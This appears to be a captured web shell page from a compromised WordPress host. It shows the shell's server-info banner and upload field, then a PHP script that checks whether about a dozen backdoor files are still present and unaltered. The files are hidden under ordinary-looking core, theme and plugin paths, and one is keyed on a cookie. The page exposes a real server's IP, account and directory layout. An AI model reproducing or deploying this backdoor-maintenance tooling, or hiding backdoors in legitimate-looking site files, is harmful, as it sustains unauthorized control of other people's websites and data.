| Server IP : 108.167.181.216 / Your IP : 216.73.217.18 Web Server : Apache System : Linux gator4198.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : nwsceces ( 2797) PHP Version : 8.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home1/nwsceces/warehouseevents.nwscwaterherald.co.ug/ |
Upload File : |
<?php $r = '/home1/nwsceces/warehouseevents.nwscwaterherald.co.ug'; $x = ["/wp-includes/category.php"=>"bd@@8912127@@4",
"/wp-includes/pomo/entry.php"=>"bd@@8911156@@60",
"/wp-content/plugins/wp-plugin-hostgator/vendor/newfold-labs/wp-module-ai/languages/wp-module-ai-fr_FR.l10n.php"=>"bd@@7737107@@1568",
"/index.php"=>"bd@@7713604@@405",
"/wp-content/plugins/creative-mail-by-constant-contact/vendor/monolog/monolog/src/Monolog/Processor/acc.php"=>"bd@@2268812@@679",
"/wp-content/plugins/wordpress-seo/src/ai-http-request/domain/exceptions/wp.request.exception.php"=>"bd@@5852575@@970",
"/wp-content/themes/yith-wonder/patterns/5-columns-product-categories.php"=>"bd@@8299132@@$_COOKIE[9",
"/wp-admin/term.php"=>"bd@@8046523@@3070",
"/index.php"=>"bd@@7815519@@405",
"/index.php"=>"bd@@7732018@@405",
"/wp-content/plugins/google-analytics-for-wordpress/includes/admin/reports/abstract-report.php"=>"bd@@7508643@@27790",
"/wp-content/plugins/wpforms-lite/src/Integrations/WPCode/events_results2.php"=>"bd@@5852614@@1065",
"/index.php"=>"bd@@8440316@@405"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');